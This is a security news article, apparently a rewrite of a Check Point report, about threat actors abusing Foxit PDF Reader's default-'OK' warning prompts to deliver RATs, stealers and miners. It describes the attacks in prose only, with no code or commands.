Multiple threat actors are exploiting a significant design vulnerability in Foxit PDF Reader, utilizing it as a conduit for distributing various malware strains, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. This exploitation triggers security warnings that can mislead unsuspecting users into executing harmful commands, according to a technical report from Check Point. The investigation outlines that this same vulnerability is being leveraged by a range of threat actors, spanning from e-crime operations to state-sponsored espionage.
Notably, the more commonly utilized Adobe Acrobat Reader does not fall prey to this specific exploit, which contributes to its low detection rates. The initial problem arises when Foxit PDF Reader presents an “OK” button as the default selection in its pop-up, prompting users to trust a document prior to enabling certain features that protect against potential security threats. Upon clicking “OK,” users are then confronted with a subsequent warning pop-up indicating that additional commands are about to be executed, also with “Open” set as the default option. This sequence ultimately leads to the downloading and executing of malicious payloads hosted on Discord’s content delivery network.
Security researcher Antonis Terefos remarked that the structure of this exploit benefits from flawed logic and typical user behavior, where the default option is typically the most detrimental. A military-themed PDF document identified by Check Point serves as a perfect example, executing a command that retrieves a downloader when opened. This downloader can subsequently fetch two executable files that siphon off sensitive data, including documents, images, and database files, transmitting this information to a command-and-control (C2) server.
The contextual analysis of this attack chain indicates that the downloader can deploy a third-stage payload capable of capturing screenshots of the compromised machine, also uploaded to the C2 server. This level of sophistication suggests that the operation may be aimed squarely at espionage, and it bears similarities to activities linked to the DoNot Team, known for using distinct tactics and techniques.
In a notable additional instance, the same exploit method was found in a multi-stage sequence that deployed a stealer and cryptocurrency miner modules, such as XMRig and lolMiner. Some of these compromised PDF files are reportedly being disseminated via platforms like Facebook, showcasing the evolving tactics of threat actors who exploit trusted platforms to gain access to users.
Recent examinations also revealed that this attack vector employs various means of delivery, including hyperlinks embedded within malicious PDFs that redirect users to additional infected content, enhancing the channels through which malware is distributed. This trend highlights a concerning reliance on trusted services, such as Discord and GitLab, as vectors for illicit activities—demonstrating a strategic shift towards blending malicious traffic with legitimate internet usage.
Check Point has flagged several .NET- and Python-based PDF building tools, including those available openly on GitHub, as instrumental in creating the malware-infected PDFs. The continuing exploitation of Foxit PDF Reader vulnerabilities reflects a broader pattern of cyber threats that hinge on user behavior and commonality in document interactions.
As Foxit prepares to address this critical vulnerability in its upcoming release, vigilance remains essential for users, particularly within business environments. The motivations behind these attacks, classified under the MITRE ATT&CK framework, can be linked to tactics such as initial access and command and control. Malware distributed via this channel highlights the deficiencies in user-awareness programs and emphasizes the need for comprehensive cybersecurity strategies to recognize and mitigate such vulnerabilities.
